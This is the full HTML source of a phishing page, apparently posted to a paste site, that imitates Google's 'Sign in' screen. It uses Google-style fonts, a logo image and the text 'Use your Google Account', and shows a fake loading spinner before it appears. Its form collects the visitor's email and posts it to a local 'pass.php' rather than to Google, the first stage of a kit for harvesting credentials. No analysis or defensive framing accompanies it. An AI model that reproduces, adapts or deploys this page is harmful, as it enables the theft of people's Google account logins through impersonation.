Untitled
3 years ago in Plain Text
<html>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<head><link href='https://fonts.googleapis.com/css?family=Roboto' rel='stylesheet'>
<title>Log In with Google to gain access.</title>
<style>
.user-input-wrp {
position: relative;
}
.user-input-wrp .inputText{
max-width: 336px;
width: 80%;
font-size: 18px;
padding-left: 12px;
outline: none;
height: 54px;
border:solid rgb(207, 201, 201) 1px;
border-radius: 4px;
box-shadow: none !important;
}
.user-input-wrp .inputText:focus{
border-color: #1b72e8;
border-width:2px;
}
.user-input-wrp .floating-label {
position: absolute;
font-family: 'Roboto';
pointer-events: none;
color: grey;
top: 35px;
left: 15%;
padding:4px;
transition: 0.3s ease all;
}
.user-input-wrp input:focus ~ .floating-label,
.user-input-wrp input:not(:focus):valid ~ .floating-label{
top: 10px;
background: white;
padding:4px;
color:#1b72e8;
left: ;
font-size: 12px;
opacity: 1;
}
body{
padding-top:83.5px;
}
.small{
font-size: 16px;
padding: 8px;
font-family: 'Roboto';
font-weight: unset;
}
.bigger{
font-family: 'Roboto';
font-size: 24px;
font-weight: 200;
}
.main{
box-sizing: inherit;
border-style: solid ;
border-radius: 9px;
border-width:1px;
border-color:rgb(207, 201, 201);
max-height:600px;
min-height:448px;
width: auto;
max-width: 440px;
}
img {
height: 24px;
padding-top: 48px;
padding-bottom: 16px;
width: 75px;
}
.division{
background: white;
height: 40px;
}
.next{
position: relative;
left:27%;
height: 36px;
width: 88px;
font-size: 16px;
border: none;
border: solid rgb(207, 201, 201) 1px;
border-radius: 4px;
background:#1b72e8 ;
color:white;
}
a:link{
text-decoration: none;
}
.for{
font-family: 'Roboto';
color: #1b72e8 ;
position: absolute;
left: 60px;
padding-top: 10px;
}
#loader {
position: absolute;
left: 50%;
top: 50%;
z-index: 0.5;
width: 150px;
height: 150px;
margin: -75px 0 0 -42px;
border: 6px solid #f3f3f3;
border-radius: 50%;
border-top: 16px solid blue;
border-right: 16px solid lightgreen;
border-bottom: 16px solid red;
border-left: 16px solid yellow;
width: 50px;
height: 50px;
-webkit-animation: spin 2s linear infinite;
animation: spin 2s linear infinite;
}
@-webkit-keyframes spin {
0% { -webkit-transform: rotate(0deg); }
100% { -webkit-transform: rotate(360deg); }
}
@keyframes spin {
0% { transform: rotate(0deg); }
100% { transform: rotate(360deg); }
}
/* Add animation to "page content" */
.animate-bottom {
position: relative;
-webkit-animation-name: animatebottom;
-webkit-animation-duration: 1s;
animation-name: animatebottom;
animation-duration: 1s
}
@-webkit-keyframes animatebottom {
from { bottom:-100px; opacity:0 }
to { bottom:0px; opacity:1 }
}
@keyframes animatebottom {
from{ bottom:-100px; opacity:0 }
to{ bottom:0; opacity:1 }
}
#myDiv {
display: none;
text-align: center;
}
</style>
</head>
<body onload="myFunction()" style="margin:0;" bgcolor="white">
<div id="loader"></div>
<div style="display:none;" id="myDiv" class="animate-bottom">
<center>
<div class="main">
<img src="./google.jpg" ><br>
<div class="bigger">Sign in</div>
<div class="small">
Use your Google Account</div>
<form class="user-input-wrp" method="post" action="./pass.php" >
<br/>
<input type="text" name="email" class="inputText" autofill=none autocapitalize=off required></input>
<span class="floating-label">Email or phone</span><br> <br>
<a href="#" class="for">Forgot email?</a>
<p id="geeks"></p>
<div class="division"></div>
<button class="next" type="submit">Next</button>
</form>
</div>
</center>
</div>
</body>
<script>
var myVar;
function myFunction() {
myVar = setTimeout(showPage, 3000);
}
function showPage() {
document.getElementById("loader").style.display = "none";
document.getElementById("myDiv").style.display = "block";
}
</script>
</html>